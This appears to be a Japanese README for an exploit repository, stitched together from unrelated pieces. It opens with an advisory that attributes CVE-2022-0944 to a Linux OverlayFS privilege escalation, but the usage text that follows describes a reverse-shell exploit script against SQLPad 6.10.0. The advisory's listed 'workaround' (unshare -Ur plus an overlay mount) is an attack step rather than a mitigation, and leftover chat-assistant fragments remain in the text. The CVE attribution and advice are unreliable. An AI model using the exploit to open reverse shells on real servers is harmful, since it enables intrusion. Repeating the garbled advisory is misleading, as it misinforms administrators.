Linux カーネルの OverlayFS における権限昇格の脆弱性に関するセキュリティ勧告と緩和ガイド。
CVE-2022-0944 は、Linux カーネルの OverlayFS サブシステムにおけるセキュリティ脆弱性であり、特定の構成下でのファイル作成処理の不備により、ローカルの攻撃者が権限を昇格できるようになるものです。

🚨 影響
ローカルの攻撃者は次のことが可能です:
巧妙に細工されたファイル操作を通じて root 権限を取得
セキュリティ制限の回避
機密性の高いシステムファイルの改ざん
システム全体の整合性の侵害
🔍 検出
grep CVE-2022-0944 /var/log/apt/history.log
# For RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944
4.🛡️ 緩和策
公式パッチ
以下のパッチ適用済みバージョンのいずれかに更新してください:
Linux カーネル 5.16.12 以降
ベンダー固有のバックポートパッチ
更新コマンド:
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
sudo yum update kernel
回避策(パッチ適用が直ちに不可能な場合)
OverlayFS の使用を制限:
sudo modprobe -r overlay
名前空間の制限を実装:
# Create unprivileged user namespace
unshare -Ur
# Mount with user restrictions
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
SELinux/AppArmor ポリシーを適用: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
⚠️ 免責事項 このドキュメントは情報提供のみを目的として提供されます。正確性を期すための努力は行われていますが、 いかなる保証も提供されません。本番環境への展開前に、必ず開発環境でパッチをテストしてください。
最終更新日: 2023-10-01 | 変更ログを表示
主な特長:
この README 形式は以下に適しています:
以下の対応をご希望ですか:
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
例:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
このリポジトリに含まれるコードとツールは、教育目的、具体的にはサイバーセキュリティコースや学習環境での使用を意図したものに過ぎません。このコードの作成者は、このコードの使用、誤用、または改変から生じるいかなる結果についても責任を負いません。このコードは、明示的か黙示的かを問わず、商品性および特定目的への適合性の黙示的保証を含むがこれに限定されない、いかなる保証もなく「現状のまま」提供されます。